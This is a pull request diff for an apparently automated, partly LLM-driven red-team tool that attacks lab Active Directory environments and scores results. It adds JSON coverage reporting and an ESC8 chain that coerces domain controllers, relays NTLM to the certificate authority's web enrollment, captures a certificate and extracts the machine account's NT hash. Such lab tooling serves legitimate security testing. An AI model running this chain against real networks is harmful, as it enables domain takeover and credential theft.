### PR TITLE
feat: improve esc8 exploitation by trying multiple coerce candidates per dispatch

### DIFF
--- a/ares-cli/src/ops/loot/format/display.rs
+++ b/ares-cli/src/ops/loot/format/display.rs
@@ -601,7 +601,11 @@ fn print_token_coverage(
 ///
 /// Kept in sync with `aresExploitedToTechniqueIDs` in
 /// `DreadGOAD/cli/internal/scoreboard/transport_ares.go`.
-fn token_category(vuln_id: &str) -> String {
+///
+/// Visible to sibling `json.rs` so the JSON output reuses the exact same
+/// classification — divergence between text and JSON views would silently
+/// confuse downstream blue-team dashboards.
+pub(super) fn token_category(vuln_id: &str) -> String {
     let lower = vuln_id.to_lowercase();
     // ADCS ESC variants are the only category where the trailing digits
     // are part of the category name (esc1, esc10_case1, esc15, ...). Long

--- a/ares-cli/src/ops/loot/format/json.rs
+++ b/ares-cli/src/ops/loot/format/json.rs
@@ -178,6 +178,10 @@ pub(super) fn print_loot_json(
             "details": v.details,
             "discovered_by": v.discovered_by,
         })).collect::<Vec<_>>(),
+        "token_coverage": build_token_coverage_json(
+            &state.discovered_vulnerabilities,
+            &state.exploited_vulnerabilities,
+        ),
         "timeline": state.all_timeline_events,
         "techniques": state.all_techniques,
     });
@@ -186,4 +190,159 @@ pub(super) fn print_loot_json(
         "{}",
         serde_json::to_string_pretty(&output).unwrap_or_default()
     );
+}
+
+/// Build a JSON object summarising scoreboard-token coverage:
+///
+/// ```json
+/// {
+///   "acl_abuse":        { "discovered": 12, "exploited": 3, "status": "partial" },
+///   "adcs_esc1":        { "discovered": 2,  "exploited": 2, "status": "ok" },
+///   "constrained_delegation": { "discovered": 2, "exploited": 0, "status": "missing" },
+///   ...
+/// }
+/// ```
+///
+/// Used by downstream consumers (blue submit, dashboards, the dreadgoad
+/// scoreboard verifier) so they don't have to re-derive category mapping
+/// from raw `vuln_id` strings. Category logic mirrors
+/// `super::display::token_category` — keep them in lock-step so the
+/// text/JSON views match.
+fn build_token_coverage_json(
+    discovered: &HashMap<String, ares_core::models::VulnerabilityInfo>,
+    exploited: &std::collections::HashSet<String>,
+) -> serde_json::Value {
+    let mut discovered_by_cat: std::collections::BTreeMap<String, usize> =
+        std::collections::BTreeMap::new();
+    let mut exploited_by_cat: std::collections::BTreeMap<String, usize> =
+        std::collections::BTreeMap::new();
+    for id in discovered.keys() {
+        let cat = super::display::token_category(id);
+        *discovered_by_cat.entry(cat).or_default() += 1;
+    }
+    for id in exploited {
+        let cat = super::display::token_category(id);
+        *exploited_by_cat.entry(cat).or_default() += 1;
+    }
+    let mut categories: Vec<&String> = discovered_by_cat.keys().collect();
+    for k in exploited_by_cat.keys() {
+        if !categories.contains(&k) {
+            categories.push(k);
+        }
+    }
+    categories.sort();
+
+    let mut out = serde_json::Map::new();
+    for cat in categories {
+        let d = discovered_by_cat.get(cat).copied().unwrap_or(0);
+        let e = exploited_by_cat.get(cat).copied().unwrap_or(0);
+        // Status mirrors the text view exactly so the operator's eye and
+        // the dashboard's diff land on the same string.
+        let status = if d == 0 && e > 0 {
+            "ok"
+        } else if e == 0 {
+            "missing"
+        } else if e >= d {
+            "ok"
+        } else {
+            "partial"
+        };
+        out.insert(
+            cat.clone(),
+            serde_json::json!({
+                "discovered": d,
+                "exploited": e,
+                "status": status,
+            }),
+        );
+    }
+    serde_json::Value::Object(out)
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use ares_core::models::VulnerabilityInfo;
+    use std::collections::HashSet;
+
+    fn vuln(vuln_type: &str, vuln_id: &str) -> VulnerabilityInfo {
+        VulnerabilityInfo {
+            vuln_id: vuln_id.to_string(),
+            vuln_type: vuln_type.to_string(),
+            target: String::new(),
+            discovered_by: "test".into(),
+            discovered_at: chrono::Utc::now(),
+            details: std::collections::HashMap::new(),
+            recommended_agent: String::new(),
+            priority: 1,
+        }
+    }
+
+    #[test]
+    fn token_coverage_groups_per_category_and_marks_status() {
+        let mut discovered: HashMap<String, VulnerabilityInfo> = HashMap::new();
+        // 2 ACL primitives discovered, 0 exploited → missing
+        discovered.insert(
+            "acl_writeproperty_alice_bob".into(),
+            vuln("writeproperty", "acl_writeproperty_alice_bob"),
+        );
+        discovered.insert(
+            "acl_genericall_alice_bob".into(),
+            vuln("genericall", "acl_genericall_alice_bob"),
+        );
+        // 1 ESC1 discovered + exploited → ok
+        discovered.insert(
+            "adcs_esc1_192.168.58.50_template".into(),
+            vuln("adcs_esc1", "adcs_esc1_192.168.58.50_template"),
+        );
+        // 2 mssql_linked_server discovered, 1 exploited → partial
+        discovered.insert(
+            "mssql_linked_server_192.168.58.51_a".into(),
+            vuln("mssql_linked_server", "mssql_linked_server_192.168.58.51_a"),
+        );
+        discovered.insert(
+            "mssql_linked_server_192.168.58.51_b".into(),
+            vuln("mssql_linked_server", "mssql_linked_server_192.168.58.51_b"),
+        );
+
+        let mut exploited: HashSet<String> = HashSet::new();
+        exploited.insert("adcs_esc1_192.168.58.50_template".into());
+        exploited.insert("mssql_linked_server_192.168.58.51_a".into());
+        // Implicit golden_ticket — emitted by milestones, no matching
+        // discovered_vulnerabilities entry. Must still appear.
+        exploited.insert("golden_ticket_contoso.local".into());
+
+        let cov = build_token_coverage_json(&discovered, &exploited);
+        let obj = cov.as_object().expect("object");
+
+        // ACL: 2 discovered, 0 exploited → missing
+        let acl = obj.get("acl_abuse").expect("acl_abuse present");
+        assert_eq!(acl.get("discovered").and_then(|v| v.as_u64()), Some(2));
+        assert_eq!(acl.get("exploited").and_then(|v| v.as_u64()), Some(0));
+        assert_eq!(acl.get("status").and_then(|v| v.as_str()), Some("missing"));
+
+        // ESC1: 1/1 → ok
+        let esc1 = obj.get("adcs_esc1").expect("adcs_esc1 present");
+        assert_eq!(esc1.get("status").and_then(|v| v.as_str()), Some("ok"));
+
+        // MSSQL Linked Server: 1/2 → partial
+        let mls = obj
+            .get("mssql_linked_server")
+            .expect("mssql_linked_server present");
+        assert_eq!(mls.get("status").and_then(|v| v.as_str()), Some("partial"));
+
+        // Golden Ticket: discovered=0, exploited=1 → ok (implicit milestone token)
+        let gt = obj.get("golden_ticket").expect("golden_ticket present");
+        assert_eq!(gt.get("discovered").and_then(|v| v.as_u64()), Some(0));
+        assert_eq!(gt.get("exploited").and_then(|v| v.as_u64()), Some(1));
+        assert_eq!(gt.get("status").and_then(|v| v.as_str()), Some("ok"));
+    }
+
+    #[test]
+    fn token_coverage_empty_state_returns_empty_object() {
+        let discovered: HashMap<String, VulnerabilityInfo> = HashMap::new();
+        let exploited: HashSet<String> = HashSet::new();
+        let cov = build_token_coverage_json(&discovered, &exploited);
+        assert_eq!(cov, serde_json::json!({}));
+    }
 }

--- a/ares-cli/src/orchestrator/automation/adcs_exploitation.rs
+++ b/ares-cli/src/orchestrator/automation/adcs_exploitation.rs
@@ -22,6 +22,15 @@ use crate::orchestrator::dispatcher::Dispatcher;
 /// Dedup key prefix for ADCS exploitation.
 const DEDUP_ADCS_EXPLOIT: &str = "adcs_exploit";
 
+/// Max coerce candidates `dispatch_esc8_deterministic` walks per dispatch.
+///
+/// Each `relay_and_coerce` invocation runs ~60–90s (listener bind, PetitPotam
+/// → PrinterBug → DFSCoerce phase walk, capture+exit). Three is enough to
+/// cover the realistic "DC1 patched, DC2/member server still bites" lab
+/// shape without one ESC8 tick blocking other automations for >5min.
+/// Subsequent attempts come on the next dedup-cleared tick.
+const ESC8_MAX_COERCE_ATTEMPTS: usize = 3;
+
 /// ADCS vulnerability types we know how to exploit.
 /// ESC1/2/3/6: certipy req (enrollment-based, certipy_request tool)
 /// ESC4: certipy template modification (certipy_template_esc4 / certipy_esc4_full_chain)
@@ -809,20 +818,30 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
         );
         return false;
     };
-    // Pick the first non-CA candidate. The `pick_coerce_targets` helper
-    // already orders DCs first then other domain-joined hosts; coercing the
-    // CA itself is rejected at the tool layer (NTLM loopback protection),
-    // and pick_coerce_targets explicitly excludes it.
-    let coerce_target = match item.coerce_candidates.first().cloned() {
-        Some(t) => t,
-        None => {
-            debug!(
-                vuln_id = %item.vuln_id,
-                "ESC8 chain skipped — no coerce candidate available (need a DC other than the CA host)"
-            );
-            return false;
-        }
-    };
+    // Collect coerce candidates. The `pick_coerce_targets` helper already
+    // orders DCs first then other domain-joined hosts; coercing the CA
+    // itself is rejected at the tool layer (NTLM loopback protection) and
+    // pick_coerce_targets explicitly excludes it.
+    //
+    // Walk up to ESC8_MAX_COERCE_ATTEMPTS candidates per tick: the first
+    // target may be patched (PetitPotam blocked) or unreachable (firewalled
+    // PrinterBug/DFSCoerce ports), in which case the relay listener bound
+    // for nothing. Trying additional candidates in the same dispatch lets
+    // a single ESC8 tick cover the realistic "DC1 hardened, DC2 / SRV03
+    // not" lab shape without bloating spawn count.
+    if item.coerce_candidates.is_empty() {
+        debug!(
+            vuln_id = %item.vuln_id,
+            "ESC8 chain skipped — no coerce candidate available (need a DC other than the CA host)"
+        );
+        return false;
+    }
+    let coerce_candidates: Vec<String> = item
+        .coerce_candidates
+        .iter()
+        .take(ESC8_MAX_COERCE_ATTEMPTS)
+        .cloned()
+        .collect();
     let Some(cred) = item.credential.clone() else {
         debug!(vuln_id = %item.vuln_id, "ESC8 chain skipped — no credential");
         return false;
@@ -843,33 +862,11 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
         .template_name
         .clone()
         .unwrap_or_else(|| "DomainController".to_string());
-    let relay_args = serde_json::json!({
-        "ca_host": ca_host,
-        "coerce_target": coerce_target,
-        "attacker_ip": attacker_ip,
-        "template": template,
-        // Authenticated coercion: pass the cred so PetitPotam / DFSCoerce
-        // can fire even on patched-unauth DCs.
-        "coerce_user": cred.username,
-        "coerce_password": cred.password,
-        "coerce_domain": cred.domain,
-    });
-
-    let relay_task_id = format!(
-        "esc8_chain_{}",
-        &uuid::Uuid::new_v4().simple().to_string()[..12]
-    );
-    let relay_call = ares_llm::ToolCall {
-        id: format!("relay_and_coerce_{}", uuid::Uuid::new_v4().simple()),
-        name: "relay_and_coerce".to_string(),
-        arguments: relay_args,
-    };
 
     info!(
-        task_id = %relay_task_id,
         vuln_id = %item.vuln_id,
         ca_host = %ca_host,
-        coerce_target = %coerce_target,
+        candidate_count = coerce_candidates.len(),
         attacker_ip = %attacker_ip,
         "ESC8 chain dispatched (direct tool, no LLM): relay+coerce phase"
     );
@@ -880,58 +877,137 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
     let domain_bg = item.domain.clone();
     let ca_host_bg = ca_host;
     tokio::spawn(async move {
-        let relay_result = dispatcher_bg
-            .llm_runner
-            .tool_dispatcher()
-            .dispatch_tool("coercion", &relay_task_id, &relay_call)
-            .await;
-        let relay_output = match relay_result {
-            Ok(r) => r,
-            Err(e) => {
+        // Walk the candidate list. First target that yields a PFX wins;
+        // ones that bail (target patched, port filtered, etc.) just
+        // advance to the next. The `relay_and_coerce` composite tool's
+        // RELAY_BIND_BUSY return value short-circuits this loop because a
+        // hot listener race won't clear in <60s — better to bail and let
+        // the next ESC8 tick retry.
+        let mut pfx_path: Option<String> = None;
+        let mut relayed_user: Option<String> = None;
+        let mut last_summary = String::new();
+        let mut bind_busy = false;
+        let mut last_task_id = String::new();
+        for (idx, coerce_target) in coerce_candidates.iter().enumerate() {
+            let relay_args = serde_json::json!({
+                "ca_host": ca_host_bg,
+                "coerce_target": coerce_target,
+                "attacker_ip": attacker_ip,
+                "template": template,
+                "coerce_user": cred.username,
+                "coerce_password": cred.password,
+                "coerce_domain": cred.domain,
+            });
+            let relay_task_id = format!(
+                "esc8_chain_{}",
+                &uuid::Uuid::new_v4().simple().to_string()[..12]
+            );
+            last_task_id = relay_task_id.clone();
+            let relay_call = ares_llm::ToolCall {
+                id: format!("relay_and_coerce_{}", uuid::Uuid::new_v4().simple()),
+                name: "relay_and_coerce".to_string(),
+                arguments: relay_args,
+            };
+            info!(
+                vuln_id = %vuln_id_bg,
+                attempt = idx + 1,
+                of = coerce_candidates.len(),
+                coerce_target = %coerce_target,
+                task_id = %relay_task_id,
+                "ESC8: trying coerce candidate"
+            );
+
+            let relay_result = dispatcher_bg
+                .llm_runner
+                .tool_dispatcher()
+                .dispatch_tool("coercion", &relay_task_id, &relay_call)
+                .await;
+            let relay_output = match relay_result {
+                Ok(r) => r,
+                Err(e) => {
+                    warn!(
+                        vuln_id = %vuln_id_bg,
+                        coerce_target = %coerce_target,
+                        err = %e,
+                        "ESC8: relay_and_coerce dispatch errored — trying next candidate"
+                    );
+                    last_summary = format!("dispatch error against {coerce_target}: {e}");
+                    continue;
+                }
+            };
+
+            // Early-out on RELAY_BIND_BUSY — another relay holds port 445
+            // host-wide. Subsequent candidates would race the same way.
+            // Clear dedup so the next ESC8 tick can retry once the holder
+            // releases.
+            if relay_output.output.contains("RELAY_BIND_BUSY") {
                 warn!(
                     vuln_id = %vuln_id_bg,
-                    err = %e,
-                    "ESC8 chain: relay_and_coerce dispatch errored — clearing dedup for retry"
+                    coerce_target = %coerce_target,
+                    "ESC8: RELAY_BIND_BUSY — another relay holds port 445; aborting candidate walk"
                 );
-                esc8_clear_dedup(&dispatcher_bg, &dedup_key_bg, &vuln_id_bg).await;
-                return;
+                bind_busy = true;
+                last_summary = "RELAY_BIND_BUSY".to_string();
+                break;
             }
-        };
 
-        // The composite tool always returns Ok even on relay failures —
-        // success is signalled by `PFX_FILE=<path>` appearing in stdout.
-        // Parse that marker; if absent, the chain didn't capture a cert.
-        let pfx_path = relay_output
-            .output
-            .lines()
-            .find_map(|line| line.trim().strip_prefix("PFX_FILE="))
-            .map(str::trim)
-            .filter(|p| !p.is_empty())
-            .map(str::to_string);
-        let relayed_user = relay_output
-            .output
-            .lines()
-            .find_map(|line| line.trim().strip_prefix("RELAYED_USER="))
-            .map(str::trim)
-            .filter(|u| !u.is_empty())
-            .map(str::to_string);
+            let candidate_pfx = relay_output
+                .output
+                .lines()
+                .find_map(|line| line.trim().strip_prefix("PFX_FILE="))
+                .map(str::trim)
+                .filter(|p| !p.is_empty())
+                .map(str::to_string);
+            let candidate_user = relay_output
+                .output
+                .lines()
+                .find_map(|line| line.trim().strip_prefix("RELAYED_USER="))
+                .map(str::trim)
+                .filter(|u| !u.is_empty())
+                .map(str::to_string);
 
-        let Some(pfx_path) = pfx_path else {
-            let summary_tail: String = relay_output
+            if let Some(p) = candidate_pfx {
+                pfx_path = Some(p);
+                relayed_user = candidate_user;
+                info!(
+                    vuln_id = %vuln_id_bg,
+                    coerce_target = %coerce_target,
+                    "ESC8: PFX captured on attempt {}",
+                    idx + 1
+                );
+                break;
+            }
+
+            last_summary = relay_output
                 .output
                 .lines()
                 .rev()
-                .take(6)
+                .take(4)
                 .collect::<Vec<_>>()
                 .into_iter()
                 .rev()
                 .collect::<Vec<_>>()
                 .join(" | ");
+            info!(
+                vuln_id = %vuln_id_bg,
+                coerce_target = %coerce_target,
+                tail = %last_summary,
+                "ESC8: candidate produced no PFX — trying next"
+            );
+        }
+
+        let Some(pfx_path) = pfx_path else {
+            if bind_busy {
+                // Transient — let the next tick retry without burning a
+                // failure counter slot.
+                esc8_clear_dedup(&dispatcher_bg, &dedup_key_bg, &vuln_id_bg).await;
+                return;
+            }
             warn!(
                 vuln_id = %vuln_id_bg,
-                task_id = %relay_task_id,
-                output_tail = %summary_tail,
-                "ESC8 chain: relay_and_coerce returned without PFX_FILE — counting as failure"
+                last_task_id = %last_task_id,
+                output_tail = %last_summary,
+                "ESC8 chain: no candidate yielded a PFX — counting as failure"
             );
             let _ = dispatcher_bg
                 .state

--- a/ares-cli/src/orchestrator/automation/adcs_exploitation.rs
+++ b/ares-cli/src/orchestrator/automation/adcs_exploitation.rs
@@ -269,6 +269,21 @@ pub async fn auto_adcs_exploitation(
                 continue;
             }
 
+            // ESC8 (NTLM relay to /certsrv) was LLM-routed and in practice
+            // failed two ways: (a) LLM picked tool order wrong / forgot
+            // certipy_auth on the captured .pfx; (b) ntlmrelayx port-445
+            // collisions surfaced as opaque "RELAY_BIND_FAILED" the agent
+            // could not action. The `relay_and_coerce` composite tool +
+            // Tier 9's port-free check + certipy_auth on the PFX path the
+            // tool prints under `PFX_FILE=` lets us drive the full chain
+            // deterministically. Same dedup/retry lifecycle as ESC1/ESC3.
+            if item.esc_type == "esc8" {
+                if dispatch_esc8_deterministic(&dispatcher, &item).await {
+                    // Spawn manages its own dedup-clear-on-failure.
+                }
+                continue;
+            }
+
             let role = role_for_esc_type(&item.esc_type);
 
             // Coercion-based ESC paths (ESC8, ESC11) need a relay listener and
@@ -750,6 +765,296 @@ async fn dispatch_esc1_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
             .await;
     });
     true
+}
+
+/// ESC8 = NTLM relay from a coerced DC to the CA's web enrollment endpoint.
+/// The full chain is:
+///   1. `relay_and_coerce` listens on `attacker_ip:445`, coerces the chosen
+///      DC via PetitPotam / PrinterBug / DFSCoerce, and relays the captured
+///      NTLM auth to `http://<ca_host>/certsrv/certfnsh.asp`. On success
+///      ntlmrelayx writes a PKCS#12 to disk and the tool surfaces
+///      `PFX_FILE=<path>` + `RELAYED_USER=<dc_machine_account>` markers.
+///   2. `certipy_auth` consumes the PFX → returns the NT hash of the
+///      relayed machine account (`<dc>$`).
+///   3. mark_exploited on the ADCS ESC8 vuln_id.
+///
+/// The vuln stays dedup-locked on success and on attempt-cap exhaustion;
+/// transient failures (RELAY_BIND_BUSY, RELAY_BIND_FAILED, missing pfx)
+/// clear dedup so the next tick can retry — that's how the chain rides out
+/// a brief listener race or a coerce target the LLM-collected list pointed
+/// at the wrong host.
+async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsExploitWork) -> bool {
+    if dispatcher.state.is_exploit_abandoned(&item.vuln_id).await {
+        info!(
+            vuln_id = %item.vuln_id,
+            "ESC8 chain skipped — vuln abandoned (>=MAX_EXPLOIT_FAILURES); locking dedup"
+        );
+        let mut state = dispatcher.state.write().await;
+        state.mark_processed(DEDUP_ADCS_EXPLOIT, item.dedup_key.clone());
+        let _ = dispatcher
+            .state
+            .persist_dedup(&dispatcher.queue, DEDUP_ADCS_EXPLOIT, &item.dedup_key)
+            .await;
+        return false;
+    }
+
+    let Some(ca_host) = item.ca_host.clone() else {
+        debug!(vuln_id = %item.vuln_id, "ESC8 chain skipped — CA host unknown");
+        return false;
+    };
+    let Some(attacker_ip) = dispatcher.config.listener_ip.clone() else {
+        debug!(
+            vuln_id = %item.vuln_id,
+            "ESC8 chain skipped — listener_ip not configured; relay has nowhere to bind"
+        );
+        return false;
+    };
+    // Pick the first non-CA candidate. The `pick_coerce_targets` helper
+    // already orders DCs first then other domain-joined hosts; coercing the
+    // CA itself is rejected at the tool layer (NTLM loopback protection),
+    // and pick_coerce_targets explicitly excludes it.
+    let coerce_target = match item.coerce_candidates.first().cloned() {
+        Some(t) => t,
+        None => {
+            debug!(
+                vuln_id = %item.vuln_id,
+                "ESC8 chain skipped — no coerce candidate available (need a DC other than the CA host)"
+            );
+            return false;
+        }
+    };
+    let Some(cred) = item.credential.clone() else {
+        debug!(vuln_id = %item.vuln_id, "ESC8 chain skipped — no credential");
+        return false;
+    };
+
+    // Mark dedup BEFORE spawning so the next 5s exploitation tick doesn't
+    // re-dispatch while the (long-running) relay is in flight.
+    {
+        let mut state = dispatcher.state.write().await;
+        state.mark_processed(DEDUP_ADCS_EXPLOIT, item.dedup_key.clone());
+    }
+    let _ = dispatcher
+        .state
+        .persist_dedup(&dispatcher.queue, DEDUP_ADCS_EXPLOIT, &item.dedup_key)
+        .await;
+
+    let template = item
+        .template_name
+        .clone()
+        .unwrap_or_else(|| "DomainController".to_string());
+    let relay_args = serde_json::json!({
+        "ca_host": ca_host,
+        "coerce_target": coerce_target,
+        "attacker_ip": attacker_ip,
+        "template": template,
+        // Authenticated coercion: pass the cred so PetitPotam / DFSCoerce
+        // can fire even on patched-unauth DCs.
+        "coerce_user": cred.username,
+        "coerce_password": cred.password,
+        "coerce_domain": cred.domain,
+    });
+
+    let relay_task_id = format!(
+        "esc8_chain_{}",
+        &uuid::Uuid::new_v4().simple().to_string()[..12]
+    );
+    let relay_call = ares_llm::ToolCall {
+        id: format!("relay_and_coerce_{}", uuid::Uuid::new_v4().simple()),
+        name: "relay_and_coerce".to_string(),
+        arguments: relay_args,
+    };
+
+    info!(
+        task_id = %relay_task_id,
+        vuln_id = %item.vuln_id,
+        ca_host = %ca_host,
+        coerce_target = %coerce_target,
+        attacker_ip = %attacker_ip,
+        "ESC8 chain dispatched (direct tool, no LLM): relay+coerce phase"
+    );
+
+    let dispatcher_bg = dispatcher.clone();
+    let vuln_id_bg = item.vuln_id.clone();
+    let dedup_key_bg = item.dedup_key.clone();
+    let domain_bg = item.domain.clone();
+    let ca_host_bg = ca_host;
+    tokio::spawn(async move {
+        let relay_result = dispatcher_bg
+            .llm_runner
+            .tool_dispatcher()
+            .dispatch_tool("coercion", &relay_task_id, &relay_call)
+            .await;
+        let relay_output = match relay_result {
+            Ok(r) => r,
+            Err(e) => {
+                warn!(
+                    vuln_id = %vuln_id_bg,
+                    err = %e,
+                    "ESC8 chain: relay_and_coerce dispatch errored — clearing dedup for retry"
+                );
+                esc8_clear_dedup(&dispatcher_bg, &dedup_key_bg, &vuln_id_bg).await;
+                return;
+            }
+        };
+
+        // The composite tool always returns Ok even on relay failures —
+        // success is signalled by `PFX_FILE=<path>` appearing in stdout.
+        // Parse that marker; if absent, the chain didn't capture a cert.
+        let pfx_path = relay_output
+            .output
+            .lines()
+            .find_map(|line| line.trim().strip_prefix("PFX_FILE="))
+            .map(str::trim)
+            .filter(|p| !p.is_empty())
+            .map(str::to_string);
+        let relayed_user = relay_output
+            .output
+            .lines()
+            .find_map(|line| line.trim().strip_prefix("RELAYED_USER="))
+            .map(str::trim)
+            .filter(|u| !u.is_empty())
+            .map(str::to_string);
+
+        let Some(pfx_path) = pfx_path else {
+            let summary_tail: String = relay_output
+                .output
+                .lines()
+                .rev()
+                .take(6)
+                .collect::<Vec<_>>()
+                .into_iter()
+                .rev()
+                .collect::<Vec<_>>()
+                .join(" | ");
+            warn!(
+                vuln_id = %vuln_id_bg,
+                task_id = %relay_task_id,
+                output_tail = %summary_tail,
+                "ESC8 chain: relay_and_coerce returned without PFX_FILE — counting as failure"
+            );
+            let _ = dispatcher_bg
+                .state
+                .record_exploit_failure(&vuln_id_bg)
+                .await;
+            if !dispatcher_bg.state.is_exploit_abandoned(&vuln_id_bg).await {
+                esc8_clear_dedup(&dispatcher_bg, &dedup_key_bg, &vuln_id_bg).await;
+            }
+            return;
+        };
+
+        info!(
+            vuln_id = %vuln_id_bg,
+            pfx = %pfx_path,
+            relayed = ?relayed_user,
+            "ESC8 chain: cert captured; authenticating with certipy_auth"
+        );
+
+        // Phase 2: certipy auth -pfx <path> -> NT hash for the relayed user.
+        // The auth produces a Hash discovery via the certipy_auth parser.
+        let mut auth_args = serde_json::json!({ "pfx": pfx_path });
+        if let Some(ref u) = relayed_user {
+            // Strip trailing `$` (impacket's relay output ends machine
+            // account names with `$`); certipy_auth wants the bare SAM name.
+            auth_args["username"] = serde_json::Value::String(u.trim_end_matches('$').to_string());
+        }
+        if !domain_bg.is_empty() {
+            auth_args["domain"] = serde_json::Value::String(domain_bg.clone());
+        }
+        if !ca_host_bg.is_empty() {
+            // certipy_auth uses dc-ip for the KDC lookup; the CA host is
+            // also a viable target since ESC8's coerced victim is a DC and
+            // its KDC sits on the same host. Caller can override via
+            // payload if a separate dc_ip is known.
+            auth_args["dc_ip"] = serde_json::Value::String(ca_host_bg.clone());
+        }
+
+        let auth_call = ares_llm::ToolCall {
+            id: format!("certipy_auth_{}", uuid::Uuid::new_v4().simple()),
+            name: "certipy_auth".to_string(),
+            arguments: auth_args,
+        };
+        let auth_task_id = format!(
+            "esc8_auth_{}",
+            &uuid::Uuid::new_v4().simple().to_string()[..12]
+        );
+        let auth_result = dispatcher_bg
+            .llm_runner
+            .tool_dispatcher()
+            .dispatch_tool("privesc", &auth_task_id, &auth_call)
+            .await;
+
+        let captured_hash = match auth_result {
+            Ok(r) => r
+                .discoveries
+                .as_ref()
+                .and_then(|d| d.get("hashes"))
+                .and_then(|h| h.as_array())
+                .map(|a| !a.is_empty())
+                .unwrap_or(false),
+            Err(_) => false,
+        };
+
+        if captured_hash {
+            // Same scoreboard-credit gap as ESC1/ESC3 — the deterministic
+            // chain bypasses the `exploit_*` task_id gate in
+            // result_processing, so we mark explicitly here.
+            if let Err(e) = dispatcher_bg
+                .state
+                .mark_exploited(&dispatcher_bg.queue, &vuln_id_bg)
+                .await
+            {
+                warn!(
+                    err = %e,
+                    vuln_id = %vuln_id_bg,
+                    "Failed to mark ESC8 exploited (chain succeeded but token not emitted)"
+                );
+            }
+            info!(
+                vuln_id = %vuln_id_bg,
+                "ESC8 chain succeeded — NTLM hash published; auto_credential_reuse will fan out from here"
+            );
+            return;
+        }
+
+        // certipy_auth didn't produce a hash. Record failure; if not yet at
+        // the attempt cap, clear dedup for retry. The .pfx is left on disk
+        // — operators can re-auth manually if the issue is transient.
+        let attempts = dispatcher_bg
+            .state
+            .record_exploit_failure(&vuln_id_bg)
+            .await;
+        let abandoned = dispatcher_bg.state.is_exploit_abandoned(&vuln_id_bg).await;
+        if abandoned {
+            warn!(
+                vuln_id = %vuln_id_bg,
+                attempts,
+                "ESC8 chain abandoned — exhausted MAX_EXPLOIT_FAILURES; dedup stays locked"
+            );
+            return;
+        }
+        warn!(
+            vuln_id = %vuln_id_bg,
+            attempts,
+            "ESC8 chain: cert captured but certipy_auth failed to produce hash — clearing dedup for retry"
+        );
+        esc8_clear_dedup(&dispatcher_bg, &dedup_key_bg, &vuln_id_bg).await;
+    });
+    true
+}
+
+/// Shared dedup-clear path for ESC8 retry. Mirrors the inline pattern from
+/// `dispatch_esc1_deterministic` / `dispatch_esc3_deterministic`, hoisted
+/// here so the multi-arm error handling in the ESC8 spawn stays readable.
+async fn esc8_clear_dedup(dispatcher: &Arc<Dispatcher>, dedup_key: &str, _vuln_id: &str) {
+    {
+        let mut state = dispatcher.state.write().await;
+        state.unmark_processed(DEDUP_ADCS_EXPLOIT, dedup_key);
+    }
+    let _ = dispatcher
+        .state
+        .unpersist_dedup(&dispatcher.queue, DEDUP_ADCS_EXPLOIT, dedup_key)
+        .await;
 }
 
 async fn dispatch_esc3_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsExploitWork) -> bool {

--- a/ares-cli/src/orchestrator/automation/adcs_exploitation.rs
+++ b/ares-cli/src/orchestrator/automation/adcs_exploitation.rs
@@ -31,6 +31,92 @@ const DEDUP_ADCS_EXPLOIT: &str = "adcs_exploit";
 /// Subsequent attempts come on the next dedup-cleared tick.
 const ESC8_MAX_COERCE_ATTEMPTS: usize = 3;
 
+/// Result of parsing a single `relay_and_coerce` tool output blob.
+#[derive(Debug, Default, PartialEq, Eq)]
+pub(crate) struct ParsedRelayOutput {
+    /// Path to the captured PKCS#12 cert when the relay succeeded. `None`
+    /// when no PFX_FILE marker appeared.
+    pub pfx_path: Option<String>,
+    /// `RELAYED_USER=<sam$>` value when present — the relayed machine
+    /// account name. Used by the certipy_auth phase to set the principal
+    /// the cert is going to authenticate as.
+    pub relayed_user: Option<String>,
+    /// True when the tool returned the RELAY_BIND_BUSY sentinel indicating
+    /// another relay already holds the host-wide port 445 mutex. Caller
+    /// should abort the candidate walk and clear dedup for next-tick retry
+    /// rather than burning failure-counter slots against a transient race.
+    pub bind_busy: bool,
+}
+
+/// Pure parser for `relay_and_coerce` stdout. Recognises:
+///   - `PFX_FILE=<path>` — relay captured a cert, stored at `<path>`
+///   - `RELAYED_USER=<sam>` — relayed identity (typically a `<dc>$` SAM)
+///   - `RELAY_BIND_BUSY` — host-wide port-445 mutex contended
+///
+/// Extracted from the ESC8 spawn body so the marker-parsing logic can be
+/// unit-tested without spinning up tokio / NATS / a real relay subprocess.
+pub(crate) fn parse_relay_coerce_output(output: &str) -> ParsedRelayOutput {
+    let mut parsed = ParsedRelayOutput::default();
+    if output.contains("RELAY_BIND_BUSY") {
+        parsed.bind_busy = true;
+        // Fall through — a tool that printed RELAY_BIND_BUSY and ALSO a
+        // stale PFX_FILE from a prior run is malformed; the bind_busy flag
+        // wins.
+        return parsed;
+    }
+    for line in output.lines() {
+        let line = line.trim();
+        if let Some(rest) = line.strip_prefix("PFX_FILE=") {
+            let v = rest.trim();
+            if !v.is_empty() {
+                parsed.pfx_path = Some(v.to_string());
+            }
+        } else if let Some(rest) = line.strip_prefix("RELAYED_USER=") {
+            let v = rest.trim();
+            if !v.is_empty() {
+                parsed.relayed_user = Some(v.to_string());
+            }
+        }
+    }
+    parsed
+}
+
+/// Cap a candidate list to `ESC8_MAX_COERCE_ATTEMPTS` and clone into a
+/// fresh Vec. Kept as a thin function so the cap logic has a unit test
+/// (callers want assurance the list is bounded before the long-running
+/// spawn walks it).
+pub(crate) fn cap_esc8_candidates(candidates: &[String]) -> Vec<String> {
+    candidates
+        .iter()
+        .take(ESC8_MAX_COERCE_ATTEMPTS)
+        .cloned()
+        .collect()
+}
+
+/// Build the `relay_and_coerce` arguments JSON. Pure — caller passes
+/// pre-validated values and gets back the JSON shape the tool expects.
+/// Separated for testability and so the `certipy_auth` follow-up code path
+/// can stay textually small in the spawn body.
+pub(crate) fn build_relay_coerce_args(
+    ca_host: &str,
+    coerce_target: &str,
+    attacker_ip: &str,
+    template: &str,
+    cred_username: &str,
+    cred_password: &str,
+    cred_domain: &str,
+) -> serde_json::Value {
+    serde_json::json!({
+        "ca_host": ca_host,
+        "coerce_target": coerce_target,
+        "attacker_ip": attacker_ip,
